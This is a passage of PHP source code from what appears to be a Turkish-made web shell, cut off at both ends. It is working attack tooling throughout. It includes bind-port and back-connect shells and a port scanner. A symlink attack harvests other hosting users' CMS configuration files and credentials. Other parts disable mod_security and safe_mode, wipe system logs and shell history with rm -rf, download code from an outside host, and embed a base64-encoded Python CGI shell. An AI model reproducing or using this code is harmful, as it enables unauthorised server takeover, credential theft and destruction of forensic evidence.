$value) = each($item);\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n $value = htmlspecialchars($value);\r\n echo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'> \r\n<a href=# onclick=\\"st(\'".$value."\')\\">".$value."</a> (".$n[\'n\'].")</nobr><br>";\r\n } echo "<input type=\'checkbox\' onclick=\'is();\r\n\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";\r\ndocument.sf.submit();\r\n\'></td><td style=\'border-top:2px solid #666;\r\n\'>";\r\n if(@$_POST[\'p1\'] == \'select\') { $_POST[\'p1\'] = \'query\';\r\n $db->query(\'SELECT COUNT(*) as n FROM \'.$_POST[\'p2\'].\'\');\r\n $num = $db->fetch();\r\n $num = $num[\'n\'];\r\n echo "<span>".$_POST[\'p2\']."</span> ($num) ";\r\n for($i=0;\r\n$i<($num/30);\r\n$i++) if($i != (int)$_POST[\'p3\']) echo "<a href=\'#\' onclick=\'st(\\"".$_POST[\'p2\']."\\", $i)\'>",($i+1),"</a> ";\r\n else echo ($i+1)," ";\r\n if($_POST[\'type\']==\'pgsql\') $_POST[\'p3\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n else $_POST[\'p3\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n echo "<br><br>";\r\n } if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p3\'])) { $db->query(@$_POST[\'p3\']);\r\n if($db->res !== false) { $title = false;\r\n echo \'<table width=100% cellspacing=0 cellpadding=2 class=main>\';\r\n $line = 1;\r\n while($item = $db->fetch()) { if(!$title) { echo \'<tr>\';\r\n foreach($item as $key => $value) echo \'<th>\'.$key.\'</th>\';\r\n reset($item);\r\n $title=true;\r\n echo \'</tr><tr>\';\r\n $line = 2;\r\n } echo \'<tr class="l\'.$line.\'">\';\r\n $line = $line==1?2:1;\r\n foreach($item as $key => $value) { if($value == null) echo \'<td><i>null</i></td>\';\r\n else echo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n } echo \'</tr>\';\r\n } echo \'</table>\';\r\n } else { echo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\r\n } } echo "<br><textarea name=\'p3\' style=\'width:100%;\r\nheight:100px\'>".@htmlspecialchars($_POST[\'p3\'])."</textarea><br/><input type=submit value=\'Execute\'>";\r\n echo "</td></tr>";\r\n } echo "</table></form><br/><form onsubmit=\'document.sf.p1.value=\\"loadfile\\";\r\ndocument.sf.p2.value=this.f.value;\r\ndocument.sf.submit();\r\nreturn false;\r\n\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>";\r\n if(@$_POST[\'p1\'] == \'loadfile\') { $db->query("SELECT LOAD_FILE(\'".addslashes($_POST[\'p2\'])."\') as file");\r\n $file = $db->fetch();\r\n echo \'<pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionNetwork() { printHeader();\r\n $back_connect_c="";\r\n $back_connect_p="";\r\n $bind_port_c="";\r\n $bind_port_p="";\r\n echo \'<h1>Network tools</h1><div class=content>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);\r\nreturn false;\r\n">\r\n <br /><span>Bind port to /bin/sh</span><br/>\r\n Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Password: <input type=\\\'text\\\' name=\\\'pass\\\' value=\\\'smurf\\\'> Using: <select name="using"><option value=\\\'bpc\\\'>C</option><option value=\\\'bpp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);\r\nreturn false;\r\n">\r\n <br /><br /><span>Back-connect to</span><br/>\r\n Server: <input type=\\\'text\\\' name=\\\'server\\\' value="\'.$_SERVER[\'REMOTE_ADDR\'].\'"> Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Using: <select name="using"><option value=\\\'bcc\\\'>C</option><option value=\\\'bcp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form><br>\';\r\n if(isset($_POST[\'p1\'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));\r\n @fclose($w);\r\n } } if($_POST[\'p1\'] == \'bpc\') { cf("/tmp/bp.c",$bind_port_c);\r\n $out = ex("gcc -o /tmp/bp /tmp/bp.c");\r\n @unlink("/tmp/bp.c");\r\n $out .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp")."</pre>";\r\n } if($_POST[\'p1\'] == \'bpp\') { cf("/tmp/bp.pl",$bind_port_p);\r\n $out = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp.pl")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcc\') { cf("/tmp/bc.c",$back_connect_c);\r\n $out = ex("gcc -o /tmp/bc /tmp/bc.c");\r\n @unlink("/tmp/bc.c");\r\n $out .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcp\') { cf("/tmp/bc.pl",$back_connect_p);\r\n $out = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc.pl")."</pre>";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionPortScanner() { printHeader();\r\n echo \'<h1>Port Scanner</h1>\';\r\n echo \'<div class="content">\';\r\n echo \'<form action="" method="post">\';\r\n if(isset($_POST[\'host\']) && is_numeric($_POST[\'end\']) && is_numeric($_POST[\'start\'])){ $start = strip_tags($_POST[\'start\']);\r\n $end = strip_tags($_POST[\'end\']);\r\n $host = strip_tags($_POST[\'host\']);\r\n for($i = $start;\r\n $i<=$end;\r\n $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3);\r\n if($fp){ echo \'Port \'.$i.\' is <font color=green>open</font><br>\';\r\n } flush();\r\n } } else { echo \'<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">\r\n <input type="hidden" name="c" value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type="hidden" name="charset" value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n Host: <input type="text" name="host" value="localhost"/><br /><br />\r\n Port start: <input type="text" name="start" value="0"/><br /><br />\r\n Port end:<input type="text" name="end" value="5000"/><br /><br />\r\n <input type="submit" value="Scan Ports" />\r\n </form></center><br /><br />\';\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionReadable() { printHeader();\r\n echo \'<h1>Readable Dirs</h1>\';\r\n echo \'<div class="content">\';\r\n $sm = ini_get(\'safe_mode\');\r\n if($sm) { echo \'<br /><b>Error: safe_mode = on</b><br /><br />\';\r\n } else { @$passwd = fopen(\'/etc/passwd\',\'r\');\r\n if (!$passwd) { echo \'<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />\';\r\n } else { $pub = array();\r\n $users = array();\r\n $conf = array();\r\n $i = 0;\r\n while(!feof($passwd)) { $str = fgets($passwd);\r\n if ($i > 35) { $pos = strpos($str,\':\');\r\n $username = substr($str,0,$pos);\r\n $dirz = \'/home/\'.$username.\'/public_html/\';\r\n if (($username != \'\')) { if (is_readable($dirz)) { array_push($users,$username);\r\n array_push($pub,$dirz);\r\n } } } $i++;\r\n } echo \'<br><br>\';\r\n echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\\n"."<br />";\r\n echo "[+] Founded ".sizeof($pub)." readable public_html directories\\n"."<br /><br /><br />";\r\n foreach ($users as $user) { $path = "/home/$user/public_html/";\r\n echo $path."<br>";\r\n } echo "<br /><br /><br />[+] Complete...\\n"."<br />";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionSymlink() { printHeader();\r\n echo \'<h1>Symlink</h1>\';\r\n $furl = \'http://\'.$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'];\r\n $expld = explode(\'/\',$furl );\r\n $burl =str_replace(end($expld),\'\',$furl);\r\n echo \'<div class="content"><center>\r\n <h3>[ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'website\\\',null)">Domains</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'whole\\\',null)">Whole Server Symlink</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'config\\\',null)">Config files symlink</a> ]</h3></center>\';\r\n if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'website\') { echo "<center>";\r\n $d0mains = @file("/etc/named.conf");\r\n if(!$d0mains){ echo "<pre class=ml1 style=\'margin-top:5px\'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=center class=\'main\' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>";\r\n $unk = array();\r\n foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\n flush();\r\n if(strlen(trim($domains[1][0])) > 2){ $unk[] = $domains[1][0];\r\n flush();\r\n } } } $count=1;\r\n $unk = array_unique($unk);\r\n $l=0;\r\n foreach($unk as $d){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$d));\r\n echo "<tr".($l?\' class=l1\':\'\')."><td>".$count."</td><td><a href=http://".$d."/>".$d."</a></td><td>".$user[\'name\']."</td></tr>";\r\n flush();\r\n $count++;\r\n $l=$l?0:1;\r\n } echo "</table>";\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'whole\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp =@fopen (\'sym/.htaccess\',\'w\');\r\n fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";\r\n $count=1;\r\n $mck = array();\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0];\r\n } } } $mck = array_unique($mck);\r\n $l=0;\r\n foreach($mck as $d) { $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$d));\r\n $ddt = $user[\'name\'];\r\n $ddt = $d;\r\n if(@eregi("\\.ir",$d) or @eregi("\\.il",$d)) { $ddt = "<div style=\' color: #FF0000 ;\r\n text-shadow: 0px 0px 1px red;\r\n \'>".$d.\'</div>\';\r\n } echo "<tr".($l?\' class=l1\':\'\')."><td>".$count++."</td><td><a target=\'_blank\' href=http://".$d.\'/>\'.$ddt.\' </a></td><td>\'.$user[\'name\']."</td><td><a href=\'sym/root/home/".$user[\'name\']."/public_html\' target=\'_blank\'>symlink </a></td></tr>";\r\n flush();\r\n $l=$l?0:1;\r\n } echo \'</table>\';\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'config\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp = @fopen (\'sym/.htaccess\',\'w\');\r\n @fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\' ><tr><th> Count </th><th> Domains </th><th> Script </th></tr>";\r\n $count = 1;\r\n $l=0;\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0]))>2){ $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$domain[1][0]));\r\n $c1 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/wp-config.php\';\r\n $ch01 = get_headers($c1);\r\n $cf01 = $ch01[0];\r\n $c2 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/blog/wp-config.php\';\r\n $ch02 = get_headers($c2);\r\n $cf02 = $ch02[0];\r\n $c3 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/configuration.php\';\r\n $ch03 = get_headers($c3);\r\n $cf03 = $ch03[0];\r\n $c4 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/joomla/configuration.php\';\r\n $ch04 = get_headers($c4);\r\n $cf04 = $ch04[0];\r\n $c5 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/config.php\';\r\n $ch05 = get_headers($c5);\r\n $cf05 = $ch05[0];\r\n $c6 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/vb/includes/config.php\';\r\n $ch06 = get_headers($c6);\r\n $cf06 = $ch06[0];\r\n $c7 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/forum/includes/config.php\';\r\n $ch07 = get_headers($c7);\r\n $cf07 = $ch07[0];\r\n $c8 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'public_html/clients/configuration.php\';\r\n $ch08 = get_headers($c8);\r\n $cf08 = $ch08[0];\r\n $c9 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/support/configuration.php\';\r\n $ch09 = get_headers($c9);\r\n $cf09 = $ch09[0];\r\n $c10 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch10 = get_headers($c10);\r\n $cf10 = $ch10[0];\r\n $c11 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/submitticket.php\';\r\n $ch11 = get_headers($c11);\r\n $cf11 = $ch11[0];\r\n $c12 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch12 = get_headers($c12);\r\n $cf12 = $ch12[0];\r\n $c13 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/configure.php\';\r\n $ch13 = get_headers($c13);\r\n $cf13 = $ch13[0];\r\n $c14 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/include/app_config.php\';\r\n $ch14 = get_headers($c14);\r\n $cf14 = $ch14[0];\r\n $c15 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/sites/default/settings.php\';\r\n $ch15 = get_headers($c15);\r\n $cf15 = $ch15[0];\r\n $out = \' \r\n\';\r\n if(strpos($cf01,\'200\') == true) { $out = "<a href=\'".$c1."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf02,\'200\') == true) { $out = "<a href=\'".$c2."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf03,\'200\') == true && strpos($cf11,\'200\') == true) { $out = " <a href=\'".$c11."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf09,\'200\') == true) { $out = " <a href=\'".$c9."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf10,\'200\') == true) { $out = " <a href=\'".$c10."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf03,\'200\') == true) { $out = " <a href=\'".$c3."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf04,\'200\') == true) { $out = " <a href=\'".$c4."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf05,\'200\') == true) { $out = " <a href=\'".$c5."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf06,\'200\') == true) { $out = " <a href=\'".$c6."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf07,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf08,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf12,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf13,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>osCommerce/Zen Cart</a>";\r\n } elseif(strpos($cf14,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Magento</a>";\r\n } elseif(strpos($cf15,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Drupal</a>";\r\n } else { continue;\r\n } echo \'<tr\'.($l?\' class=l1\':\'\').\'><td>\'.$count++.\'</td><td><a href=http://www.\'.$domain[1][0].\'/>\'.$domain[1][0].\'</a></td><td>\'.$user[\'name\'].\'</td><td>\'.$out.\'</td></tr>\';\r\n flush();\r\n $l=$l?0:1;\r\n } } } echo "</table>";\r\n } echo "</center>";\r\n } echo "</div>";\r\n printFooter();\r\n } function actionSafeMode() { printHeader();\r\n echo \'<h1>Safe Mode</h1>\';\r\n echo \'<div class="content">\';\r\n echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS[\'cwd\']." |<br><br />";\r\n echo \'<a href=# onclick="g(null,null,\\\'php.ini\\\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\\\'ini\\\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\\\'sh\\\')">| .htaccess(perl) | </a></center>\';\r\n if(!empty($_POST[\'p2\']) && isset($_POST[\'p2\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'<IfModule mod_security.c>\r\n Sec------Engine Off\r\n Sec------ScanPOST Off\r\n </IfModule>\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p1\'])&& isset($_POST[\'p1\'])) { $fil=fopen($GLOBALS[\'cwd\']."php.ini","w");\r\n fwrite($fil,\'safe_mode=OFF\r\n disable_functions=NONE\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p3\']) && isset($_POST[\'p3\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'Options FollowSymLinks MultiViews Indexes ExecCGI\r\n AddType application/x-httpd-cgi .sh\r\n AddHandler cgi-script .pl\r\n AddHandler cgi-script .pl\');\r\n fclose($fil);\r\n } echo "<br><br /><br /></div>";\r\n echo \'</div>\';\r\n printFooter();\r\n} function actionSQLBUDDY(){ printHeader();\r\n if(!file_exists(\'yazilimlar/sqlbuddy/index.php\')){ $dizin = \'https://byr00t.co/vb/sqlbuddy.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "sqlbuddy");\r\n $zip = new ZipArchive();\r\n $file = \'sqlbuddy.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'yazilimlar/\');\r\n if(file_exists(\'sqlbuddy.zip\')){ @unlink(\'sqlbuddy.zip\');\r\n } if($cikar){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'yazilimlar/sqlbuddy/index.php\')){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionDeleteLOG(){ printHeader();\r\n echo \'<h1>Delete Logs</h1>\';\r\n function cmdExe($in) { $out = \'\';\r\n if (function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n } else if (function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n } elseif (function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n } elseif (function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n } elseif (is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } cmdExe("rm -rf /tmp/logs");\r\n cmdExe("rm -rf /root/.ksh_history");\r\n cmdExe("rm -rf /root/.bash_history");\r\n cmdExe("rm -rf /root/.bash_logout");\r\n cmdExe("rm -rf /usr/local/apache/logs");\r\n cmdExe("rm -rf /usr/local/apache/log");\r\n cmdExe("rm -rf /var/apache/logs");\r\n cmdExe("rm -rf /var/apache/log");\r\n cmdExe("rm -rf /var/run/utmp");\r\n cmdExe("rm -rf /var/logs");\r\n cmdExe("rm -rf /var/log");\r\n cmdExe("rm -rf /var/adm");\r\n cmdExe("rm -rf /etc/wtmp");\r\n cmdExe("rm -rf /etc/utmp");\r\n cmdExe("rm -rf $HISTFILE");\r\n cmdExe("rm -rf /var/log/lastlog");\r\n cmdExe("rm -rf /var/log/wtmp");\r\n echo \'<div style="padding:5px;\r\n">\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /tmp/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.ksh_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.bash_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/run/utmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/adm <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /etc/wtmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> $HISTFILE<br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/lastlog <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/wtmp <br>\r\n </div>\';\r\n printFooter();\r\n } function actionPython(){ printHeader();\r\n if(!is_dir(\'python\')){ mkdir(\'python\', 0755);\r\n } chdir(\'python\');\r\n$kokdosya = ".htaccess";\r\n $dosya_adi = "$kokdosya";\r\n $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya aç\r\nı\r\nlamadı\r\n!");\r\n $metin = "AddHandler cgi-script .r00t";\r\n fwrite ( $dosya , $metin ) ;\r\n fclose ($dosya);\r\n $pythonp = \'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB\r\nIHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD\r\nb3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg\r\ncmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv\r\nciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg\r\nY29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg\r\nZm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv\r\nYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g\r\nZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5\r\nOgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y\r\ndCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz\r\ndHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy\r\nb20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs\r\naW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt\r\nc2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw\r\nNCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg\r\nPSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F\r\nVEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl\r\ncwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi\r\nIlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g\r\naXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs\r\ndWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu\r\nZy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g\r\nd2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg\r\naXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg\r\nICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk\r\nXSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt\r\nW2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv\r\ncm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg\r\nPSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y\r\nIGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg\r\nICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z\r\naGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0